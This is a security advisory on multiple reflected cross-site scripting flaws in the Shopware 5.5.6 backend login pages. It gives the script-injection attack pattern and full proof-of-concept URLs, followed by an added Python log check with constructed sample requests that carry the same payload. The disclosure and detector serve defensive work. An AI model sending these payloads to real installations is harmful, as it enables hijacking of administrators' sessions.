Shopware 5.5.6 Cross Site Scripting

Shopware version 5.5.6 suffers from multiple cross-site scripting vulnerabilities.


MD5 | 18aa2a2c54c5818505a7790500efa69a

*Information:*
Advisory by Netsparker
Name: Multiple Cross-site Scripting Vulnerabilities in Shopware
Affected Software: Shopware
Affected Versions: 5.5.6
Homepage: https://en.shopware.com/
Vulnerability: Cross-site Scripting
Severity: High
Status: Fixed
CVSS Score (3.0): AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
Netsparker Advisory Reference: NS-19-004


*Technical Details:*
URL : http://{DOMAIN}/{PATH-OF-SHOPWARE}/backend/Login?'"--></style></scRipt><scRipt>alert(“test”)</scRipt>
Parameter Type : Query String
Parameter Name : Query Based
Attack Pattern : '"--></style></scRipt><scRipt>alert(“test”)</scRipt>

URL : http://{DOMAIN}/{PATH-OF-SHOPWARE}/backend/Login/load/?'"--></style></scRipt><scRipt>alert(“test”)</scRipt>
Parameter Type : Query String
Parameter Name : Query Based
Attack Pattern : '"--></style></scRipt><scRipt>alert(“test”)</scRipt>

Regards,

Daniel Bishtawi
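
Added example, not part of the Netsparker advisory or Shopware's code: a log check that flags requests to the two backend login paths listed under Technical Details when their query string decodes to HTML markup. The combined access log format, the `/shop` install prefix and every sample line are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Backend login paths named in the advisory, under any install prefix.
LOGIN_PATH = re.compile(r"/backend/login(?:/load)?/?$", re.IGNORECASE)
# HTML tag openers or a comment terminator: not expected in a login query string.
MARKUP = re.compile(r"<\s*[a-z!/]|-->", re.IGNORECASE)
# Request target inside a combined-format access log line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded markup is also seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_login_requests(log_lines):
    """Return (line_number, decoded_query) for flagged backend login requests."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not LOGIN_PATH.search(target.path):
            continue  # only the endpoints from the advisory are in scope
        query = decode_fully(target.query)
        if MARKUP.search(query):
            hits.append((number, query))
    return hits


# Constructed sample lines: documentation IPs, hypothetical /shop prefix and parameters.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2019:10:00:00 +0000] "GET /shop/backend/Login HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2019:10:00:05 +0000] "GET /shop/backend/Login?%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%E2%80%9Ctest%E2%80%9D)%3C/scRipt%3E HTTP/1.1" 200 733',
    '192.0.2.10 - - [01/Jan/2019:10:00:09 +0000] "GET /shop/backend/Login/load/?ts=1546336800 HTTP/1.1" 200 2048',
    '192.0.2.12 - - [01/Jan/2019:10:00:12 +0000] "GET /shop/backend/Login/load/?%2527%2522--%253E%253CscRipt%253E HTTP/1.1" 200 2101',
    '192.0.2.13 - - [01/Jan/2019:10:00:20 +0000] "GET /shop/search?q=%3Cb%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, query in suspicious_login_requests(SAMPLE_LOG):
        print(f"line {number}: markup in login query string: {query!r}")
```

A hit only shows that markup was sent to the endpoint; whether it was reflected depends on the installed version, which the advisory lists as fixed after 5.5.6.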
